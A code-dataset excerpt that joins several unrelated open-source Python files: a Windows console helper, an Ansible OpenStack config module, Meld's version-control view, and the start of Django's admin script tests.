BACKGROUND_BLUE = 0x0010 # background color contains blue.
BACKGROUND_GREEN = 0x0020 # background color contains green.
BACKGROUND_RED = 0x0040 # background color contains red.
BACKGROUND_WHITE = 0x0070
BACKGROUND_INTENSITY = 0x0080 # background color is intensified.
SHORT = ctypes.c_short
class COORD(ctypes.Structure):
_fields_ = [('X', SHORT),
('Y', SHORT)]
class SMALL_RECT(ctypes.Structure):
_fields_ = [('Left', SHORT),
('Top', SHORT),
('Right', SHORT),
('Bottom', SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(ctypes.Structure):
_fields_ = [('dwSize', COORD),
('dwCursorPosition', COORD),
('wAttributes', wintypes.WORD),
('srWindow', SMALL_RECT),
('dwMaximumWindowSize', COORD)]
_GetStdHandle = ctypes.windll.kernel32.GetStdHandle
_GetStdHandle.argtypes = [wintypes.DWORD]
_GetStdHandle.restype = wintypes.HANDLE
def GetStdHandle(kind):
return _GetStdHandle(kind)
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
SetConsoleTextAttribute.argtypes = [wintypes.HANDLE, wintypes.WORD]
SetConsoleTextAttribute.restype = wintypes.BOOL
_GetConsoleScreenBufferInfo = \
ctypes.windll.kernel32.GetConsoleScreenBufferInfo
_GetConsoleScreenBufferInfo.argtypes = [wintypes.HANDLE,
ctypes.POINTER(CONSOLE_SCREEN_BUFFER_INFO)]
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
def GetConsoleInfo(handle):
info = CONSOLE_SCREEN_BUFFER_INFO()
_GetConsoleScreenBufferInfo(handle, ctypes.byref(info))
return info
def _getdimensions():
handle = GetStdHandle(STD_OUTPUT_HANDLE)
info = GetConsoleInfo(handle)
# Substract one from the width, otherwise the cursor wraps
# and the ending \n causes an empty line to display.
return info.dwSize.Y, info.dwSize.X - 1
def write_out(fil, msg):
# XXX sometimes "msg" is of type bytes, sometimes text which
# complicates the situation. Should we try to enforce unicode?
try:
# on py27 and above writing out to sys.stdout with an encoding
# should usually work for unicode messages (if the encoding is
# capable of it)
fil.write(msg)
except UnicodeEncodeError:
# on py26 it might not work because stdout expects bytes
if fil.encoding:
try:
fil.write(msg.encode(fil.encoding))
except UnicodeEncodeError:
# it might still fail if the encoding is not capable
pass
else:
fil.flush()
return
# fallback: escape all unicode characters
msg = msg.encode("unicode-escape").decode("ascii")
fil.write(msg)
fil.flush()
| mpl-2.0 |
QijunPan/ansible | lib/ansible/modules/cloud/openstack/os_client_config.py | 21 | 2493 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: os_client_config
short_description: Get OpenStack Client config
description:
- Get I(openstack) client config data from clouds.yaml or environment
version_added: "2.0"
notes:
- Facts are placed in the C(openstack.clouds) variable.
options:
clouds:
description:
- List of clouds to limit the return list to. No value means return
information on all configured clouds
required: false
default: []
requirements: [ os-client-config ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
- name: Get list of clouds that do not support security groups
os_client_config:
- debug:
var: "{{ item }}"
with_items: "{{ openstack.clouds | rejectattr('secgroup_source', 'none') | list }}"
- name: Get the information back just about the mordred cloud
os_client_config:
clouds:
- mordred
'''
import os_client_config
from os_client_config import exceptions
def main():
module = AnsibleModule(argument_spec=dict(
clouds=dict(required=False, type='list', default=[]),
))
p = module.params
try:
config = os_client_config.OpenStackConfig()
clouds = []
for cloud in config.get_all_clouds():
if not p['clouds'] or cloud.name in p['clouds']:
cloud.config['name'] = cloud.name
clouds.append(cloud.config)
module.exit_json(ansible_facts=dict(openstack=dict(clouds=clouds)))
except exceptions.OpenStackConfigException as e:
module.fail_json(msg=str(e))
# import module snippets
from ansible.module_utils.basic import *
if __name__ == "__main__":
main()
| gpl-3.0 |
girving/meld | vcview.py | 1 | 27928 | ### Copyright (C) 2002-2006 Stephen Kennedy <stevek@gnome.org>
### This program is free software; you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation; either version 2 of the License, or
### (at your option) any later version.
### This program is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
### You should have received a copy of the GNU General Public License
### along with this program; if not, write to the Free Software
### Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import tempfile
import shutil
import gtk
import os
from gettext import gettext as _
import tree
import misc
import gnomeglade
import melddoc
import paths
import vc
################################################################################
#
# Local Functions
#
################################################################################
def _expand_to_root( treeview, path ):
"""Expand rows from path up to root"""
start = path[:]
while len(start) and not treeview.row_expanded(start):
start = start[:-1]
level = len(start)
while level < len(path):
level += 1
treeview.expand_row( path[:level], 0)
def _commonprefix(files):
if len(files) != 1:
workdir = misc.commonprefix(files)
else:
workdir = os.path.dirname(files[0])
return workdir
################################################################################
#
# CommitDialog
#
################################################################################
class CommitDialog(gnomeglade.Component):
def __init__(self, parent):
gnomeglade.Component.__init__(self, paths.ui_dir("vcview.glade"), "commitdialog")
self.parent = parent
self.widget.set_transient_for( parent.widget.get_toplevel() )
selected = parent._get_selected_files()
topdir = _commonprefix(selected)
selected = [ s[len(topdir):] for s in selected ]
self.changedfiles.set_text( ("(in %s) "%topdir) + " ".join(selected) )
self.widget.show_all()
def run(self):
self.previousentry.child.set_editable(False)
self.previousentry.set_active(0)
self.textview.grab_focus()
buf = self.textview.get_buffer()
buf.place_cursor( buf.get_start_iter() )
buf.move_mark( buf.get_selection_bound(), buf.get_end_iter() )
response = self.widget.run()
msg = buf.get_text(buf.get_start_iter(), buf.get_end_iter(), 0)
if response == gtk.RESPONSE_OK:
self.parent._command_on_selected( self.parent.vc.commit_command(msg) )
if len(msg.strip()):
self.previousentry.prepend_text(msg)
self.widget.destroy()
def on_previousentry_activate(self, gentry):
buf = self.textview.get_buffer()
buf.set_text( gentry.child.get_text() )
COL_LOCATION, COL_STATUS, COL_REVISION, COL_TAG, COL_OPTIONS, COL_END = range(tree.COL_END, tree.COL_END+6)
class VcTreeStore(tree.DiffTreeStore):
def __init__(self):
tree.DiffTreeStore.__init__(self, 1, COL_END)
self.textstyle[tree.STATE_MISSING] = '<span foreground="#000088" strikethrough="true" weight="bold">%s</span>'
################################################################################
# filters
################################################################################
entry_modified = lambda x: (x.state >= tree.STATE_NEW) or (x.isdir and (x.state > tree.STATE_NONE))
entry_normal = lambda x: (x.state == tree.STATE_NORMAL)
entry_nonvc = lambda x: (x.state == tree.STATE_NONE) or (x.isdir and (x.state > tree.STATE_IGNORED))
entry_ignored = lambda x: (x.state == tree.STATE_IGNORED) or x.isdir
################################################################################
#
# VcView
#
################################################################################
class VcView(melddoc.MeldDoc, gnomeglade.Component):
# Map action names to VC commands and required arguments list
action_vc_cmds_map = {
"VcCompare": ("diff_command", ()),
"VcCommit": ("commit_command", ("",)),
"VcUpdate": ("update_command", ()),
"VcAdd": ("add_command", ()),
"VcAddBinary": ("add_command", ()),
"VcResolved": ("resolved_command", ()),
"VcRemove": ("remove_command", ()),
"VcRevert": ("revert_command", ()),
}
def __init__(self, prefs):
melddoc.MeldDoc.__init__(self, prefs)
gnomeglade.Component.__init__(self, paths.ui_dir("vcview.glade"), "vcview")
actions = (
("VcCompare", gtk.STOCK_DIALOG_INFO, _("_Compare"), None, _("Compare selected"), self.on_button_diff_clicked),
("VcOpen", gtk.STOCK_OPEN, None, None, _("Open selected"), self.on_button_open_clicked),
("VcCommit", "vc-commit-24", _("_Commit"), None, _("Commit"), self.on_button_commit_clicked), # FIXME: popup used to use gtk.STOCK_GO_BACK
("VcUpdate", "vc-update-24", _("_Update"), None, _("Update"), self.on_button_update_clicked), # FIXME: popup used to use gtk.STOCK_GO_FORWARD
("VcAdd", "vc-add-24", _("_Add"), None, _("Add to VC"), self.on_button_add_clicked), # FIXME: popup used to use gtk.STOCK_ADD
("VcAddBinary", gtk.STOCK_ADD, _("Add _Binary"), None, _("Add binary to VC"), self.on_button_add_binary_clicked), # FIXME: stock is inconsistent with other VC actions
("VcRemove", "vc-remove-24", _("_Remove"), None, _("Remove from VC"), self.on_button_remove_clicked), # FIXME: popup used to use gtk.STOCK_REMOVE
("VcResolved", "vc-resolve-24", _("_Resolved"), None, _("Mark as resolved for VC"), self.on_button_resolved_clicked),
("VcRevert", gtk.STOCK_REVERT_TO_SAVED, None, None, _("Revert to original"), self.on_button_revert_clicked),
("VcDeleteLocally", gtk.STOCK_DELETE, None, None, _("Delete locally"), self.on_button_delete_clicked), # FIXME: popup label was "_Remove locally"
)
toggleactions = (
("VcFlatten", gtk.STOCK_GOTO_BOTTOM, _("_Flatten"), None, _("Flatten directories"), self.on_button_flatten_toggled, True),
("VcShowModified","filter-modified-24", _("_Modified"), None, _("Show modified"), self.on_button_filter_toggled, True),
("VcShowNormal", "filter-normal-24", _("_Normal"), None, _("Show normal"), self.on_button_filter_toggled, False),
("VcShowNonVC", "filter-nonvc-24", _("Non _VC"), None, _("Show unversioned files"), self.on_button_filter_toggled, False),
("VcShowIgnored", "filter-ignored-24", _("Ignored"), None, _("Show ignored files"), self.on_button_filter_toggled, False),
)
self.ui_file = paths.ui_dir("vcview-ui.xml")
self.actiongroup = gtk.ActionGroup('VcviewActions')
self.actiongroup.set_translation_domain("meld")
self.actiongroup.add_actions(actions)
self.actiongroup.add_toggle_actions(toggleactions)
for action in ("VcCompare", "VcFlatten", "VcShowModified",
"VcShowNormal", "VcShowNonVC", "VcShowIgnored"):
self.actiongroup.get_action(action).props.is_important = True
for action in ("VcCommit", "VcUpdate", "VcAdd", "VcRemove",
"VcShowModified", "VcShowNormal", "VcShowNonVC",
"VcShowIgnored", "VcResolved"):
button = self.actiongroup.get_action(action)
button.props.icon_name = button.props.stock_id
self.tempdirs = []
self.model = VcTreeStore()
self.treeview.set_model(self.model)
self.treeview.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
self.treeview.set_headers_visible(1)
column = gtk.TreeViewColumn( _("Name") )
renpix = gtk.CellRendererPixbuf()
rentext = gtk.CellRendererText()
column.pack_start(renpix, expand=0)
column.pack_start(rentext, expand=1)
column.set_attributes(renpix, pixbuf=self.model.column_index(tree.COL_ICON, 0))
column.set_attributes(rentext, markup=self.model.column_index(tree.COL_TEXT, 0))
self.treeview.append_column(column)
def addCol(name, num):
column = gtk.TreeViewColumn(name)
rentext = gtk.CellRendererText()
column.pack_start(rentext, expand=0)
column.set_attributes(rentext, markup=self.model.column_index(num, 0))
self.treeview.append_column(column)
return column
self.treeview_column_location = addCol( _("Location"), COL_LOCATION)
addCol(_("Status"), COL_STATUS)
addCol(_("Rev"), COL_REVISION)
addCol(_("Tag"), COL_TAG)
addCol(_("Options"), COL_OPTIONS)
class ConsoleStream(object):
def __init__(self, textview):
self.textview = textview
b = textview.get_buffer()
self.mark = b.create_mark("END", b.get_end_iter(), 0)
def write(self, s):
if s:
b = self.textview.get_buffer()
b.insert(b.get_end_iter(), s)
self.textview.scroll_mark_onscreen( self.mark )
self.consolestream = ConsoleStream(self.consoleview)
self.location = None
self.treeview_column_location.set_visible(self.actiongroup.get_action("VcFlatten").get_active())
self.fileentry.show() #TODO: remove once bug 97503 is fixed
if not self.prefs.vc_console_visible:
self.on_console_view_toggle(self.console_hide_box)
self.vc = None
# VC ComboBox
self.combobox_vcs = gtk.ComboBox()
self.combobox_vcs.lock = True
self.combobox_vcs.set_model(gtk.ListStore(str, object))
cell = gtk.CellRendererText()
self.combobox_vcs.pack_start(cell, False)
self.combobox_vcs.add_attribute(cell, 'text', 0)
self.combobox_vcs.lock = False
self.hbox2.pack_end(self.combobox_vcs, expand=False)
self.combobox_vcs.show()
self.combobox_vcs.connect("changed", self.on_vc_change)
def update_actions_sensitivity(self):
"""Disable actions that use not implemented VC plugin methods
"""
for action_name, (meth_name, args) in self.action_vc_cmds_map.items():
action = self.actiongroup.get_action(action_name)
try:
getattr(self.vc, meth_name)(*args)
action.props.sensitive = True
except NotImplementedError:
action.props.sensitive = False
def choose_vc(self, vcs):
"""Display VC plugin(s) that can handle the location"""
self.combobox_vcs.lock = True
self.combobox_vcs.get_model().clear()
tooltip_texts = [_("Choose one Version Control"),
_("Only one Version Control in this directory")]
default_active = 0
# Try to keep the same VC plugin active on refresh()
for idx, avc in enumerate(vcs):
if (self.vc is not None and
self.vc.__class__ == avc.__class__):
default_active = idx
self.combobox_vcs.get_model().append([avc.NAME, avc])
if gtk.pygtk_version >= (2, 12, 0):
self.combobox_vcs.set_tooltip_text(tooltip_texts[len(vcs) == 1])
self.combobox_vcs.set_sensitive(len(vcs) > 1)
self.combobox_vcs.lock = False
self.combobox_vcs.set_active(default_active)
def on_vc_change(self, cb):
if not cb.lock:
self.vc = cb.get_model()[cb.get_active_iter()][1]
self._set_location(self.vc.root)
self.update_actions_sensitivity()
def set_location(self, location):
self.choose_vc(vc.get_vcs(os.path.abspath(location or ".")))
def _set_location(self, location):
self.location = location
self.model.clear()
self.fileentry.set_filename(location)
self.fileentry.prepend_history(location)
it = self.model.add_entries( None, [location] )
self.treeview.grab_focus()
self.treeview.get_selection().select_iter(it)
self.model.set_state(it, 0, tree.STATE_NORMAL, isdir=1)
self.recompute_label()
self.scheduler.remove_all_tasks()
self.scheduler.add_task( self._search_recursively_iter(self.model.get_iter_root()).next )
def recompute_label(self):
self.label_text = os.path.basename(self.location)
self.label_changed()
def _search_recursively_iter(self, iterstart):
yield _("[%s] Scanning %s") % (self.label_text,"")
rootpath = self.model.get_path( iterstart )
rootname = self.model.value_path( self.model.get_iter(rootpath), 0 )
prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
todo = [ (rootpath, rootname) ]
filters = []
if self.actiongroup.get_action("VcShowModified").get_active():
filters.append( entry_modified )
if self.actiongroup.get_action("VcShowNormal").get_active():
filters.append( entry_normal )
if self.actiongroup.get_action("VcShowNonVC").get_active():
filters.append( entry_nonvc )
if self.actiongroup.get_action("VcShowIgnored").get_active():
filters.append( entry_ignored )
def showable(entry):
for f in filters:
if f(entry): return 1
recursive = self.actiongroup.get_action("VcFlatten").get_active()
self.vc.cache_inventory(rootname)
while len(todo):
todo.sort() # depth first
path, name = todo.pop(0)
if path:
it = self.model.get_iter( path )
root = self.model.value_path( it, 0 )
else:
it = self.model.get_iter_root()
root = name
yield _("[%s] Scanning %s") % (self.label_text, root[prefixlen:])
#import time; time.sleep(1.0)
entries = filter(showable, self.vc.listdir(root))
differences = 0
for e in entries:
differences |= (e.state != tree.STATE_NORMAL)
if e.isdir and recursive:
todo.append( (None, e.path) )
continue
child = self.model.add_entries(it, [e.path])
self._update_item_state( child, e, root[prefixlen:] )
if e.isdir:
todo.append( (self.model.get_path(child), None) )
if not recursive: # expand parents
if len(entries) == 0:
self.model.add_empty(it, _("(Empty)"))
if differences or len(path)==1:
_expand_to_root( self.treeview, path )
else: # just the root
self.treeview.expand_row( (0,), 0)
self.vc.uncache_inventory()
def on_fileentry_activate(self, fileentry):
path = fileentry.get_full_path()
self.set_location(path)
def on_quit_event(self):
self.scheduler.remove_all_tasks()
for f in self.tempdirs:
if os.path.exists(f):
shutil.rmtree(f, ignore_errors=1)
def on_delete_event(self, appquit=0):
self.on_quit_event()
return gtk.RESPONSE_OK
def on_row_activated(self, treeview, path, tvc):
it = self.model.get_iter(path)
if self.model.iter_has_child(it):
if self.treeview.row_expanded(path):
self.treeview.collapse_row(path)
else:
self.treeview.expand_row(path,0)
else:
path = self.model.value_path(it, 0)
self.run_diff( [path] )
def run_diff_iter(self, path_list, empty_patch_ok):
yield _("[%s] Fetching differences") % self.label_text
difffunc = self._command_iter(self.vc.diff_command(), path_list, 0).next
diff = None
while type(diff) != type(()):
diff = difffunc()
yield 1
prefix, patch = diff[0], diff[1]
yield _("[%s] Applying patch") % self.label_text
if patch:
self.show_patch(prefix, patch)
elif empty_patch_ok:
misc.run_dialog( _("No differences found."), parent=self, messagetype=gtk.MESSAGE_INFO)
else:
for path in path_list:
self.emit("create-diff", [path])
def run_diff(self, path_list, empty_patch_ok=0):
for path in path_list:
self.scheduler.add_task(self.run_diff_iter([path], empty_patch_ok).next, atfront=1)
def on_button_press_event(self, text, event):
if event.button==3:
self.popup_menu.popup(None, None, None, 3, event.time)
return len(self._get_selected_treepaths()) != 1
return 0
def on_button_flatten_toggled(self, button):
self.treeview_column_location.set_visible(self.actiongroup.get_action("VcFlatten").get_active())
self.refresh()
def on_button_filter_toggled(self, button):
self.refresh()
def _get_selected_treepaths(self):
sel = []
def gather(model, path, it):
sel.append( model.get_path(it) )
s = self.treeview.get_selection()
s.selected_foreach(gather)
return sel
def _get_selected_files(self):
sel = []
def gather(model, path, it):
sel.append( model.value_path(it,0) )
s = self.treeview.get_selection()
s.selected_foreach(gather)
# remove empty entries and remove trailing slashes
return [ x[-1]!="/" and x or x[:-1] for x in sel if x != None ]
def _command_iter(self, command, files, refresh):
"""Run 'command' on 'files'. Return a tuple of the directory the
command was executed in and the output of the command.
"""
msg = misc.shelljoin(command)
yield "[%s] %s" % (self.label_text, msg.replace("\n", u"\u21b2") )
def relpath(pbase, p):
kill = 0
if len(pbase) and p.startswith(pbase):
kill = len(pbase) + 1
return p[kill:] or "."
if len(files) == 1 and os.path.isdir(files[0]):
workdir = self.vc.get_working_directory(files[0])
else:
workdir = self.vc.get_working_directory( _commonprefix(files) )
files = [ relpath(workdir, f) for f in files ]
r = None
self.consolestream.write( misc.shelljoin(command+files) + " (in %s)\n" % workdir)
readfunc = misc.read_pipe_iter(command + files, self.consolestream, workdir=workdir).next
try:
while r == None:
r = readfunc()
self.consolestream.write(r)
yield 1
except IOError, e:
misc.run_dialog("Error running command.\n'%s'\n\nThe error was:\n%s" % ( misc.shelljoin(command), e),
parent=self, messagetype=gtk.MESSAGE_ERROR)
if refresh:
self.refresh_partial(workdir)
yield workdir, r
def _command(self, command, files, refresh=1):
"""Run 'command' on 'files'.
"""
self.scheduler.add_task( self._command_iter(command, files, refresh).next )
def _command_on_selected(self, command, refresh=1):
files = self._get_selected_files()
if len(files):
self._command(command, files, refresh)
else:
misc.run_dialog( _("Select some files first."), parent=self, messagetype=gtk.MESSAGE_INFO)
def on_button_update_clicked(self, obj):
self._command_on_selected( self.vc.update_command() )
def on_button_commit_clicked(self, obj):
dialog = CommitDialog( self )
dialog.run()
def on_button_add_clicked(self, obj):
self._command_on_selected(self.vc.add_command() )
def on_button_add_binary_clicked(self, obj):
self._command_on_selected(self.vc.add_command(binary=1))
def on_button_remove_clicked(self, obj):
self._command_on_selected(self.vc.remove_command())
def on_button_resolved_clicked(self, obj):
self._command_on_selected(self.vc.resolved_command())
def on_button_revert_clicked(self, obj):
self._command_on_selected(self.vc.revert_command())
def on_button_delete_clicked(self, obj):
files = self._get_selected_files()
for name in files:
try:
if os.path.isfile(name):
os.remove(name)
elif os.path.isdir(name):
if misc.run_dialog(_("'%s' is a directory.\nRemove recursively?") % os.path.basename(name),
parent = self,
buttonstype=gtk.BUTTONS_OK_CANCEL) == gtk.RESPONSE_OK:
shutil.rmtree(name)
except OSError, e:
misc.run_dialog(_("Error removing %s\n\n%s.") % (name,e), parent = self)
workdir = _commonprefix(files)
self.refresh_partial(workdir)
def on_button_diff_clicked(self, obj):
files = self._get_selected_files()
if len(files):
self.run_diff(files, empty_patch_ok=1)
def on_button_open_clicked(self, obj):
self._open_files(self._get_selected_files())
def show_patch(self, prefix, patch):
tmpdir = tempfile.mkdtemp("-meld")
self.tempdirs.append(tmpdir)
diffs = []
for fname in self.vc.get_patch_files(patch):
destfile = os.path.join(tmpdir,fname)
destdir = os.path.dirname( destfile )
if not os.path.exists(destdir):
os.makedirs(destdir)
pathtofile = os.path.join(prefix, fname)
try:
shutil.copyfile( pathtofile, destfile)
except IOError: # it is missing, create empty file
open(destfile,"w").close()
diffs.append( (destfile, pathtofile) )
patchcmd = self.vc.patch_command( tmpdir )
if misc.write_pipe(patchcmd, patch) == 0:
for d in diffs:
self.emit("create-diff", d)
else:
import meldapp
msg = _("""
Invoking 'patch' failed.
Maybe you don't have 'GNU patch' installed,
or you use an untested version of %s.
Please send email bug report to:
meld-list@gnome.org
Containing the following information:
- meld version: '%s'
- source control software type: '%s'
- source control software version: 'X.Y.Z'
- the output of '%s somefile.txt'
- patch command: '%s'
(no need to actually run it, just provide
the command line)
Replace 'X.Y.Z' by the actual version for the
source control software you use.
""") % (self.vc.NAME,
meldapp.version,
self.vc.NAME,
" ".join(self.vc.diff_command()),
" ".join(patchcmd))
msg = '\n'.join([line.strip() for line in msg.split('\n')])
misc.run_dialog(msg, parent=self)
def refresh(self):
self.set_location( self.model.value_path( self.model.get_iter_root(), 0 ) )
def refresh_partial(self, where):
if not self.actiongroup.get_action("VcFlatten").get_active():
it = self.find_iter_by_name( where )
if it:
newiter = self.model.insert_after( None, it)
self.model.set_value(newiter, self.model.column_index( tree.COL_PATH, 0), where)
self.model.set_state(newiter, 0, tree.STATE_NORMAL, isdir=1)
self.model.remove(it)
self.scheduler.add_task( self._search_recursively_iter(newiter).next )
else: # XXX fixme
self.refresh()
def _update_item_state(self, it, vcentry, location):
e = vcentry
self.model.set_state( it, 0, e.state, e.isdir )
def setcol(col, val):
self.model.set_value(it, self.model.column_index(col, 0), val)
setcol(COL_LOCATION, location)
setcol(COL_STATUS, e.get_status())
setcol(COL_REVISION, e.rev)
setcol(COL_TAG, e.tag)
setcol(COL_OPTIONS, e.options)
def on_file_changed(self, filename):
it = self.find_iter_by_name(filename)
if it:
path = self.model.value_path(it, 0)
files = self.vc.lookup_files([], [(os.path.basename(path), path)])[1]
for e in files:
if e.path == path:
prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
self._update_item_state( it, e, e.parent[prefixlen:])
return
def find_iter_by_name(self, name):
it = self.model.get_iter_root()
path = self.model.value_path(it, 0)
while it:
if name == path:
return it
elif name.startswith(path):
child = self.model.iter_children( it )
while child:
path = self.model.value_path(child, 0)
if name == path:
return child
elif name.startswith(path):
break
else:
child = self.model.iter_next( child )
it = child
else:
break
return None
def on_console_view_toggle(self, box, event=None):
if box == self.console_hide_box:
self.prefs.vc_console_visible = 0
self.console_hbox.hide()
self.console_show_box.show()
else:
self.prefs.vc_console_visible = 1
self.console_hbox.show()
self.console_show_box.hide()
def on_consoleview_populate_popup(self, text, menu):
item = gtk.ImageMenuItem(gtk.STOCK_CLEAR)
def activate(*args):
buf = text.get_buffer()
buf.delete( buf.get_start_iter(), buf.get_end_iter() )
item.connect("activate", activate)
item.show()
menu.insert( item, 0 )
item = gtk.SeparatorMenuItem()
item.show()
menu.insert( item, 1 )
def next_diff(self, direction):
start_iter = self.model.get_iter( (self._get_selected_treepaths() or [(0,)])[-1] )
def goto_iter(it):
curpath = self.model.get_path(it)
for i in range(len(curpath)-1):
self.treeview.expand_row( curpath[:i+1], 0)
self.treeview.set_cursor(curpath)
search = {gtk.gdk.SCROLL_UP : self.model.inorder_search_up}.get(direction, self.model.inorder_search_down)
for it in search( start_iter ):
state = int(self.model.get_state( it, 0))
if state not in (tree.STATE_NORMAL, tree.STATE_EMPTY):
goto_iter(it)
return
def on_reload_activate(self, *extra):
self.on_fileentry_activate(self.fileentry)
| gpl-2.0 |
danilito19/django | tests/admin_scripts/tests.py | 95 | 91070 | # -*- coding: utf-8 -*-
"""
A series of tests to establish that the command-line management tools work as
advertised - especially with regards to the handling of the
DJANGO_SETTINGS_MODULE and default settings.py files.
"""
from __future__ import unicode_literals
import codecs
import os
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import unittest
import django
from django import conf, get_version
from django.conf import settings
from django.core.management import (
BaseCommand, CommandError, call_command, color,
)
from django.db import ConnectionHandler
from django.db.migrations.exceptions import MigrationSchemaMissing
from django.db.migrations.recorder import MigrationRecorder
from django.test import (
LiveServerTestCase, SimpleTestCase, mock, override_settings,
)
from django.test.runner import DiscoverRunner
from django.utils._os import npath, upath
from django.utils.encoding import force_text
from django.utils.six import PY3, StringIO
test_dir = os.path.realpath(os.path.join(tempfile.gettempdir(), 'test_project'))
if not os.path.exists(test_dir):
os.mkdir(test_dir)
open(os.path.join(test_dir, '__init__.py'), 'w').close()
custom_templates_dir = os.path.join(os.path.dirname(upath(__file__)), 'custom_templates')
SYSTEM_CHECK_MSG = 'System check identified no issues'
class AdminScriptTestCase(unittest.TestCase):
def write_settings(self, filename, apps=None, is_dir=False, sdict=None, extra=None):
if is_dir:
settings_dir = os.path.join(test_dir, filename)
os.mkdir(settings_dir)
settings_file_path = os.path.join(settings_dir, '__init__.py')
else:
settings_file_path = os.path.join(test_dir, filename)
with open(settings_file_path, 'w') as settings_file:
settings_file.write('# -*- coding: utf-8 -*\n')
settings_file.write('# Settings file automatically generated by admin_scripts test case\n')
if extra:
settings_file.write("%s\n" % extra)
exports = [
'DATABASES',
'ROOT_URLCONF',
'SECRET_KEY',
'TEST_RUNNER', # We need to include TEST_RUNNER, otherwise we get a compatibility warning.
'MIDDLEWARE_CLASSES', # We need to include MIDDLEWARE_CLASSES, otherwise we get a compatibility warning.
]
for s in exports:
if hasattr(settings, s):
o = getattr(settings, s)
if not isinstance(o, (dict, tuple, list)):
o = "'%s'" % o
settings_file.write("%s = %s\n" % (s, o))
if apps is None:
apps = ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts']
settings_file.write("INSTALLED_APPS = %s\n" % apps)
if sdict:
for k, v in sdict.items():
settings_file.write("%s = %s\n" % (k, v))
def remove_settings(self, filename, is_dir=False):
full_name = os.path.join(test_dir, filename)
if is_dir:
shutil.rmtree(full_name)
else:
os.remove(full_name)
# Also try to remove the compiled file; if it exists, it could
# mess up later tests that depend upon the .py file not existing
try:
if sys.platform.startswith('java'):
# Jython produces module$py.class files
os.remove(re.sub(r'\.py$', '$py.class', full_name))
else:
# CPython produces module.pyc files
os.remove(full_name + 'c')
except OSError:
pass
# Also remove a __pycache__ directory, if it exists
cache_name = os.path.join(test_dir, '__pycache__')
if os.path.isdir(cache_name):
shutil.rmtree(cache_name)
def _ext_backend_paths(self):
"""
Returns the paths for any external backend packages.
"""
paths = []
first_package_re = re.compile(r'(^[^\.]+)\.')
for backend in settings.DATABASES.values():
result = first_package_re.findall(backend['ENGINE'])
if result and result != ['django']:
backend_pkg = __import__(result[0])
backend_dir = os.path.dirname(backend_pkg.__file__)
paths.append(os.path.dirname(backend_dir))
return paths
def run_test(self, script, args, settings_file=None, apps=None):
base_dir = os.path.dirname(test_dir)
# The base dir for Django's tests is one level up.
tests_dir = os.path.dirname(os.path.dirname(upath(__file__)))
# The base dir for Django is one level above the test dir. We don't use
# `import django` to figure that out, so we don't pick up a Django
# from site-packages or similar.
django_dir = os.path.dirname(tests_dir)
ext_backend_base_dirs = self._ext_backend_paths()
# Define a temporary environment for the subprocess
test_environ = os.environ.copy()
if sys.platform.startswith('java'):
python_path_var_name = 'JYTHONPATH'
else:
python_path_var_name = 'PYTHONPATH'
old_cwd = os.getcwd()
# Set the test environment
if settings_file:
test_environ['DJANGO_SETTINGS_MODULE'] = str(settings_file)
elif 'DJANGO_SETTINGS_MODULE' in test_environ:
del test_environ['DJANGO_SETTINGS_MODULE']
python_path = [base_dir, django_dir, tests_dir]
python_path.extend(ext_backend_base_dirs)
# Use native strings for better compatibility
test_environ[str(python_path_var_name)] = npath(os.pathsep.join(python_path))
test_environ[str('PYTHONWARNINGS')] = str('')
# Move to the test directory and run
os.chdir(test_dir)
out, err = subprocess.Popen([sys.executable, script] + args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=test_environ, universal_newlines=True).communicate()
# Move back to the old working directory
os.chdir(old_cwd)
return out, err
def run_django_admin(self, args, settings_file=None):
script_dir = os.path.abspath(os.path.join(os.path.dirname(upath(django.__file__)), 'bin'))
return self.run_test(os.path.join(script_dir, 'django-admin.py'), args, settings_file)
def run_manage(self, args, settings_file=None):
def safe_remove(path):
try:
os.remove(path)
except OSError:
pass
conf_dir = os.path.dirname(upath(conf.__file__))
template_manage_py = os.path.join(conf_dir, 'project_template', 'manage.py')
test_manage_py = os.path.join(test_dir, 'manage.py')
shutil.copyfile(template_manage_py, test_manage_py)
with open(test_manage_py, 'r') as fp:
manage_py_contents = fp.read()
manage_py_contents = manage_py_contents.replace(
"{{ project_name }}", "test_project")
with open(test_manage_py, 'w') as fp:
fp.write(manage_py_contents)
self.addCleanup(safe_remove, test_manage_py)
return self.run_test('./manage.py', args, settings_file)
def assertNoOutput(self, stream):
"Utility assertion: assert that the given stream is empty"
self.assertEqual(len(stream), 0, "Stream should be empty: actually contains '%s'" % stream)
def assertOutput(self, stream, msg, regex=False):
"Utility assertion: assert that the given message exists in the output"
stream = force_text(stream)
if regex:
self.assertIsNotNone(re.search(msg, stream),
"'%s' does not match actual output text '%s'" % (msg, stream))
else:
self.assertIn(msg, stream, "'%s' does not match actual output text '%s'" % (msg, stream))
def assertNotInOutput(self, stream, msg):
"Utility assertion: assert that the given message doesn't exist in the output"
stream = force_text(stream)
self.assertNotIn(msg, stream, "'%s' matches actual output text '%s'" % (msg, stream))
##########################################################################
# DJANGO ADMIN TESTS
# This first series of test classes checks the environment processing
# of the django-admin.py script
##########################################################################
class DjangoAdminNoSettings(AdminScriptTestCase):
